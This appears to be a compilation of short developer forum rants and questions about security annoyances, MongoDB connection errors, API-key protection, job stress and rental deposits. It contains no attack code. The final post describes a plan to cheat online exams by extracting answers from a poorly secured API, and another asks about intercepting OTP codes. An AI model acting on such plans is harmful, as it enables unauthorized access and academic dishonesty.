I know that you will blame the market needs (you cannot understand the need from the start; you have to do it agile), but I think that this is also a part of the problem.
Old devices evolved at a much slower pace. A radio was a radio, and a radio still does its basic functionality the same way (the upgrades were only some memory functionalities, like saving your beloved frequencies, and screen messages).
Although all answers are valid, I still feel that we have failed. We have failed so much. The dream of being a programmer is to build something, have it bring you money or satisfaction, and then you are bored, so you build something completely new.
-
Is it really good OpSec to log me out of Outlook every hour when the password manager lets me automatically log back in?
-
What if the earth was a prison, and we are all prisoners at a maximum security prison serving our sentences virtually? Honestly, if this is the case I won't be surprised.
-
MongoDB CEO and the developer who built this shit-for-brains interface should be tarred and feathered. Almost 90 minutes in and I cannot connect to anything other than error codes. What in the actual fuck is your job other than to make it difficult for a "free tier" user to connect?
"connect ECONNREFUSED 127.0.0.1:27017"
Oh ok, another 20 minutes of work and you give me a bland beige error code like "```TLS/SSL is disabled. If possible, enable TLS/SSL to avoid security vulnerabilities.```"... um ok, how do I enable it for your site, your database or on my computer... oh wait, you don't say shit, do you?
So now I'm fully 81 minutes into this shit show and all I get for error codes are these really descriptive gems: 'getaddrinfo ENOTFOUND cluster0.hudbd.mongodb 'dot' net' comes up if I choose `mongo` with "connection string scheme" above it, or 'bad auth : Authentication failed'
-
I have the following scenario with a proposed solution, can anyone please confirm it is a secure choice:
- We have critical API keys that we do not want to ship with the app, because de-compiling will give access to those keys, and the request is done before the user logs in; we are dealing with guests
Solution:
- Add a Lambda function which accepts requests from the app and returns the API keys
- Lambda will accept the following:
1. Android app signing key sha1
2. iOS signing certificate sha1
- If lambda was able to validate them API keys are sent back.
My concerns:
- Can an attacker read the request from the original (non-tampered) apk and see what the actual sha1 value is on his local network?
- If the answer to the question above is yes, what is the recommended way to validate that the request received is actually from the app that we shipped and not from curl/Postman/a script/a modified version of the app?
-
I once changed all of the passwords of my main online accounts (Google, Apple, Facebook, Telegram, Outlook), as they hadn't been changed for years.
I decided on unique and long passwords for each of them. 😎
Immediately after changing the passwords, I forgot all of them. 😵 Fortunately, I was able to reset.
Has this ever happened to anyone?
-
For a project I'm working on:
Does your work allow you to sign in to your personal accounts for e.g. Gmail or Facebook on your work device?
Do you think this should be allowed?
Do you do it yourself?
I imagine it's a gray area. I'm even thinking it could be a security risk? But maybe healthier too, to keep business and private life separate? Thoughts?
-
I’m in a tough spot - I’m completely overloaded with sysadmin type work (server upgrades, firewall and vendor coordination, security, password maintenance) that I don’t have time to complete any programming work assigned to me. My bosses are aware and have done their best to help, but I just can’t keep up (have two young kids too and just can’t work nights anymore without trouble at home). My bosses have been great, so I feel terrible about this, but I think I’m going to have to look for another employer, I can’t do this anymore. Am I a horrible person to leave them with so much work even though they tried to help me?8
-
Checking for root is maintaining a false façade of security. By the definition of root, it can always be bypassed, and we should be designing workflows to discourage logging in from an untrusted device unless you have 2FA.
-
Every single time that I realised how much of my expertise sounds like vaporware to people, mostly management and C-level.
I have been working on security for quite some time now, but seeing that I can't really get through makes me feel useless and not worth my weight in shit.
-
Is it possible to add a layer of security, such as a password, when you use the Thunderbird Mail application? So when you open it, it would require a password to proceed to checking mails, etc.
-
A few years ago we had a fail-over which was successful until we started failing everything back to primary servers. The applications could not start at all.
4 hours into troubleshooting, only to find out some Java security files were misbehaving. Updated them from another server and it worked.
To date I haven't understood how it failed.
-
Classifying hack tools as viruses in Windows Defender or whatever puts at risk users who want to hack some device but have to disable Defender to use them (and could potentially download malicious software bundled together with or inside the hack tool)
-
All their petty torturous crap does is get them beaten and killed in the long run. Meanwhile their 'security' system keeps them trapped. Hurray.
-
Simple. Get that fucking project I’ve been on and off working on (mostly) by myself for the last year and a half or so into production so that I can begin the transition to my new role… where I get to be a major pain in the arse for all our devs with my security pitchfork. Mwahaha!
-
The red-haired girl and the blue-haired girl.
There was this story about a programmer who spent years studying computer science before finally getting a job.
The dev studied only computer science and was put on the blue team after a few days.
A few hours into one of the constant coding sessions, the boss told the devs that red team members and blue team members would be working in pairs.
The person from the red team transferred the dev's work to their database without the dev knowing, then locked down the dev's computer. The dev could not do anything. Later, the dev got fired for not doing any work. After that, the company got millions of dollars, and the dev did not see any of it.
Both the dev and the managers made a note not to hire any programmer who cannot secure their work.
It is not ethical to teach people programming without also teaching them cyber security.
Computer networking, programming and security should all be the same major.
It is a bad idea to teach people how to build anything without telling them how to secure it.
The story above was just a scenario, but it probably happens way more often than people think.
Schools should teach both things in the same major.
-
Guys, is it possible to catch an OTP code sent from a website to a phone through the browser, just because of a lack of security practice and a weakly coded script?
-
I am so fucking conflicted right now, seeing my future getting ruined in front of my present eyes. Life always gives me a chance to jump out of a ship that's about to fucking blow; I took it the first time, but this time I missed it for bravery (and stupidity), and now I am sinking alongside this fucking ship.
My first job was amazing: decent work, sometimes a lot and sometimes too little. I would learn new things, interact with people, handle a lot of fuckups. At one point I felt like looking for another opportunity, got one giving a 50% hike, so I jumped ship and sent a resignation letter. The notice period was short, so I enjoyed my days applying to other ships. Got an even better offer with a 100% hike, so from one boat to another to now a literal cruise.
Later I got to know that my original company went bankrupt and fired 85% of the staff. The next month, the company that gave me the first offer laid off 30% of the staff.
Now the waters are tough and my cruise is also getting impacted. But instead of firing, they are asking us to come to the office permanently. Their office is in a fucked-up place: you need 8$ just to breathe the fucking air there. It's the city of blood and money, and you will be giving away both things there.
My brain got split into 2 parts after this announcement: my stupid self was still considering this while my sensible self started applying for jobs. My stupid self was thinking that this is a great opportunity to leave my fucking nest of a home, where I have been living with my parents for the last 25 years, and learn to live alone: clean utensils, cook food, wash clothes... I wanted to live life the harsh way.
But life still took pity on the fool that I am and gave me an opportunity: an opportunity to work with a big brand who hasn't done any layoffs in their 40+ years of existence (but is also known for giving shit increments).
The offer was just a 40% hike, but it was near my home. I could be in the office in 1 hr for less than a dollar a day and still earn more than what I am earning now.
Plus my notice period is now 60 days, so who knows what other offer I could have got in those 60 days (when I would keep my profile with a big green "immediately available to hire" circle on me).
However, this time I didn't jump the boat. I asked them for a bigger raise; they declined, and my stupid self was more than happy.
Now the company has started to send mails regarding relocation, and yep, the cruise is sinking, at least for me. If I was saving x in this company, my savings would become x/8 if I go to that city. In the new offer it would have at worst remained x.
And that's not even half of what's bothering me. I had accepted the money loss in exchange for what that city and my company had to offer: a chance to experience WFO, a chance to live life like a mature man and not a kid in his mom's house, and a life full of hurdles and strangers.
However, I always like to keep an emergency fallback mechanism on me, for if things don't work out. I don't wanna go depressed and cut my wrists there; I don't want people to hurt me so much that I can't recover. I want to run away from that wretched city the moment I start to lose the battles there and the city starts taking over me.
But what the holy fuck? My company's notice period is 60 days, and my rented room's security deposit is 6 fucking months? I will be giving 6 months of deposit + 1 month of brokerage + 1 month of rent on the first day I put my steps on that wretched land after travelling in a 100 dollar flight! Where am I supposed to get this much money?!
And okay, somehow I manage this. Say I did an 11-month agreement, paid the fucking 8 months of rent in one go and simply started living a shitty life there. In month 2 I break down and want to implement my escape mechanism. It would go like this: I will suck it up and try to live rent-free for the next 6 months. But wait, THAT'S NOT FUCKING ALLOWED!! I am supposed to get my security AFTER 11+1 MONTHS!! Why not freaking adjust it in my rent?
I can't think straight. 6 months of security deposit has blown my brain. I am regretting anything and everything. I can't think of my roommates' situation, home safety, room location, whatever the fuck we think about while looking for a room. All I can think is... WHY SO MUCH MONEY NEEDS TO GO AT ONCE!?
FUCK
-
I love how shitty-looking VPN software is used in my company. How can I trust you to provide me security if you can't fucking provide correctly rendered icons?
-
Last year I did a statistics course, and my classes were completely remote. When it came down to exam season, instead of studying I learned Python's data analysis libraries, and I passed with flying colors. I have an idea: if exams continue to be online, I will be spending a lot of my time trying to get the answers from whatever API they are using; hopefully, they have poor security. If it's hopeless, I'll just study.